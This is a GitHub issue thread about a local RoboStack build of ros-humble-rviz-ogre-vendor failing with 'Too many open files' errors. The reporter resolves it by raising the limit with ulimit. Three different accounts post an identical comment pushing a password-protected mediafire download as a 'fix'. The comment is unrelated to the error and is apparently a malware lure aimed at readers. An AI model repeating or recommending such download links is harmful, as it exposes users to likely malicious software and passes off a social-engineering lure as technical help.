RoboStack/ros-humble #207: Help needed: local build , linux-64,  ros-humble-rviz-ogre-vendor, too many open files

sonelu, 2024-08-27:
### Solution to issue cannot be found in the documentation.

- [X] I checked the documentation.

### Issue

I'm building the 'desktop' variant for the new build 7 for linux-64.

I'm getting the following error that is flooding the terminal (it's issued a few hundred times):
```
/home/rs/miniforge3/envs/rs-linux-64/bin/patch: **** Can't create file Components/Overlay/include/OgreFont.h.orig : Too many open files
```
and the build fails:
```
...
/home/rs/miniforge3/envs/rs-linux-64/bin/patch: **** Can't create file Components/Overlay/include/OgreFont.h.orig : Too many open files
/home/rs/miniforge3/envs/rs-linux-64/bin/patch: **** Can't create file Components/Overlay/include/OgreFont.h.orig : Too many open files
/home/rs/miniforge3/envs/rs-linux-64/bin/patch: **** Can't create file Components/Overlay/include/OgreFont.h.origSegmentation fault
ninja: build stopped: subcommand failed.

Work directory: /home/rs/miniforge3/envs/rs-linux-64/conda-bld/ros-humble-rviz-ogre-vendor-0_1724747116672/work
Try building again with
/home/rs/miniforge3/envs/rs-linux-64/conda-bld/ros-humble-rviz-ogre-vendor-0_1724747116672/work/conda_build.sh
ERROR: Build failed!
╭─────────────────────────────── Traceback (most recent call last) ────────────────────────────────╮
│ /home/rs/miniforge3/envs/rs-linux-64/lib/python3.11/site-packages/boa/core/build.py:659 in build │
│                                                                                                  │
│   656 │   │   │   f.write("\n".join(sorted(list(files_before_script))))                          │
│   657 │   │   │   f.write("\n")                                                                  │
│   658 │   │                                                                                      │
│ ❱ 659 │   │   execute_build_script(m, src_dir, env, provision_only=provision_only)               │
│   660 │   │                                                                                      │
│   661 │   │   if provision_only:                                                                 │
│   662 │   │   │   return                                                                         │
│                                                                                                  │
│ /home/rs/miniforge3/envs/rs-linux-64/lib/python3.11/site-packages/boa/core/build.py:550 in       │
│ execute_build_script                                                                             │
│                                                                                                  │
│   547 │   │   │   │   │   del env["CONDA_BUILD"]                                                 │
│   548 │   │   │   │   │   env["PKG_NAME"] = m.get_value("package/name")                          │
│   549 │   │   │   │   │                                                                          │
│ ❱ 550 │   │   │   │   │   utils.check_call_env(                                                  │
│   551 │   │   │   │   │   │   cmd,                                                               │
│   552 │   │   │   │   │   │   env=env,                                                           │
│   553 │   │   │   │   │   │   rewrite_stdout_env=rewrite_env,                                    │
│                                                                                                  │
│ /home/rs/miniforge3/envs/rs-linux-64/lib/python3.11/site-packages/conda_build/utils.py:405 in    │
│ check_call_env                                                                                   │
│                                                                                                  │
│    402                                                                                           │
│    403                                                                                           │
│    404 def check_call_env(popenargs, **kwargs):                                                  │
│ ❱  405 │   return _func_defaulting_env_to_os_environ("call", *popenargs, **kwargs)               │
│    406                                                                                           │
│    407                                                                                           │
│    408 def check_output_env(popenargs, **kwargs):                                                │
│                                                                                                  │
│ /home/rs/miniforge3/envs/rs-linux-64/lib/python3.11/site-packages/conda_build/utils.py:381 in    │
│ _func_defaulting_env_to_os_environ                                                               │
│                                                                                                  │
│    378 │   │   │   out = proc.out.read()                                                         │
│    379 │   │                                                                                     │
│    380 │   │   if proc.returncode != 0:                                                          │
│ ❱  381 │   │   │   raise subprocess.CalledProcessError(proc.returncode, _args)                   │
│    382 │   │                                                                                     │
│    383 │   │   stats.update(                                                                     │
│    384 │   │   │   {                                                                             │
╰──────────────────────────────────────────────────────────────────────────────────────────────────╯
CalledProcessError: Command '['/bin/bash', '-o', 'errexit',
'/home/rs/miniforge3/envs/rs-linux-64/conda-bld/ros-humble-rviz-ogre-vendor-0_1724747116672/work/conda_build.sh']'
[... 47 lines cut ...]
                 solver : libmamba (default)
       virtual packages : __archspec=1=skylake
                          __conda=24.3.0=0
                          __cuda=12.5=0
                          __glibc=2.35=0
                          __linux=5.15.146.1=0
                          __unix=0=0
       base environment : /home/rs/miniforge3  (writable)
      conda av data dir : /home/rs/miniforge3/etc/conda
  conda av metadata url : None
           channel URLs : https://conda.anaconda.org/robostack-staging/linux-64
                          https://conda.anaconda.org/robostack-staging/noarch
                          https://conda.anaconda.org/conda-forge/linux-64
                          https://conda.anaconda.org/conda-forge/noarch
          package cache : /home/rs/miniforge3/pkgs
                          /home/rs/.conda/pkgs
       envs directories : /home/rs/miniforge3/envs
                          /home/rs/.conda/envs
               platform : linux-64
             user-agent : conda/24.3.0 requests/2.31.0 CPython/3.10.14 Linux/5.15.146.1-microsoft-standard-WSL2 ubuntu/22.04.3 glibc/2.35 solver/libmamba conda-libmamba-solver/24.1.0 libmambapy/1.5.8
                UID:GID : 1001:1001
             netrc file : None
           offline mode : False
```
```

NikhilKumar77777, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ahmar7, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

sonelu, 2024-08-27:
using
```
ulimit -n 4096
```
on my environment did the trick.

I will put a comment in the PR when I submit it to remember if this is something already covered in the pipeline setup or will need to be explicitly updated.

closed 2024-08-27 by sonelu